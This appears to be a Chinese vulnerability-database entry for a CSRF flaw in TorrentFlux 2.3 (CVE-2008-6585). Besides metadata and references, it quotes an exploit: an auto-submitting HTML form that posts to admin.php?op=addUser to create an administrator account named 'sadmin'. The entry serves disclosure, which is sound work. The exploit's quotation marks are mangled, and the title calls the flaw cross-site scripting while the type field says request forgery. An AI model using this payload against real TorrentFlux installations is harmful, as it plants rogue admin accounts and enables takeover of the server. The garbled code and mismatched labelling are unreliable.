TorrentFlux 跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115024 漏洞类型 跨站请求伪造
发布时间 2008-04-18 更新时间 2009-04-06
CVE编号 CVE-2008-6585 CNNVD-ID CNNVD-200904-053
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/31671
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-053
|漏洞详情
TorrentFlux是一款基于PHP的BitTorrent下载客户端,它可通过一个便利的Web界面管理所有的Torrent下载。如果架设在Web服务器上,便可以通过Web界面对BitTorrent下载进行管理。TorrentFlux脚本html/index.php存在跨站脚本攻击漏洞,远程攻击者可以通过addUser操作劫持管理员增加用户请求。
|漏洞EXP
source: http://www.securityfocus.com/bid/28846/info

TorrentFlux is prone to a cross-site request-forgery vulnerability and a remote PHP code-execution vulnerability.

Exploiting these issues may allow a remote attacker to create administrative accounts in the application or to execute arbitrary PHP script code. This may facilitate the remote compromise of affected computers.

TorrentFlux 2.3 is vulnerable; other versions may also be affected.

<html> Add an admistrative account: <form id=?create_admin? method=?post? action=?http://localhost/torrentflux_2.3/html/admin.php?op=addUser?> <input type=hidden name=?newUser? value=?sadmin?> <input type=hidden name=?pass1″ value=?password?> <input type=hidden name=?pass2″ value=?password?> <input type=hidden name=?userType? value=1> <input type=submit value=?create admin?> </form> </html> <script> document.getElementById(?create_admin?).submit(); </script>
|参考资料

来源:XF
名称:torrentflux-admin-csrf(41926)
链接:http://xforce.iss.net/xforce/xfdb/41926
来源:BID
名称:28846
链接:http://www.securityfocus.com/bid/28846
来源:BUGTRAQ
名称:20080418BitTorrentClientsandCSRF
链接:http://www.securityfocus.com/archive/1/archive/1/491066/100/0/threaded
来源:SECUNIA
名称:29935
链接:http://secunia.com/advisories/29935
来源:OSVDB
名称:44646
链接:http://osvdb.org/44646